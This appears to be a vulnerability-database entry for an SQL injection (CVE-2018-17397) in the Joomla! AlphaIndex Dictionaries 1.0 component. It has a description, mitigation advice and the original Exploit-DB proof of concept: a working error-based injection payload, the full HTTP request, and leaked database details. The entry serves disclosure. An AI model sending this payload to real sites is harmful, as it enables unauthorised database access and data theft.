Joomla! Component AlphaIndex Dictionaries 1.0 - SQL Injection

vendor:

AlphaIndex Dictionaries

by:

Ihsan Sencan

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: AlphaIndex Dictionaries

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: CVE-2018-17397

CPE: a:multiplanet:alphaindex_dictionaries:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Joomla! Component AlphaIndex Dictionaries 1.0 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component AlphaIndex Dictionaries 1.0. An attacker can send a specially crafted HTTP POST request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'letter' parameter of the 'index.php?option=com_aindexdictionaries&task=getArticlesPreview' POST request.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version.

Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Joomla! Component AlphaIndex Dictionaries 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: http://multiplanet.gr/
# Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/alphaindex-dictionaries/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17397
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_aindexdictionaries&task=getArticlesPreview
# 
# Parameter: letter=[SQL] (POST)
#  
# Payload: " AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari
# 
#  POST /alphaindex-dictionaries/index.php?option=com_aindexdictionaries&task=getArticlesPreview HTTP/1.1
#  Host: localhost
#  User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
#  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
#  Accept-Language: en-US,en;q=0.5
#  Accept-Encoding: gzip, deflate
#  Cookie: 4d2a26b1a22184c44838ed58a1427b57=a5ebafd40988be7421846f2e1a496b61
#  Connection: keep-alive
#  Upgrade-Insecure-Requests: 1
#  Content-Type: application/x-www-form-urlencoded
#  Content-Length: 200
#  
#  letter=" AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari
#  HTTP/1.1 500 Duplicate entry 'multipla_multi@localhost : multipla_dictionary : 10.2.17-MariaDB' for key 'group_key' SQL=SELECT .............
#  Server: nginx admin
#  Date: Mon, 17 Sep 2018 16:15:28 GMT
#  Content-Type: text/html; charset=utf-8
#  Transfer-Encoding: chunked
#  Connection: keep-alive
#  Cache-Control: no-cache
#  Pragma: no-cache
#  
# # # #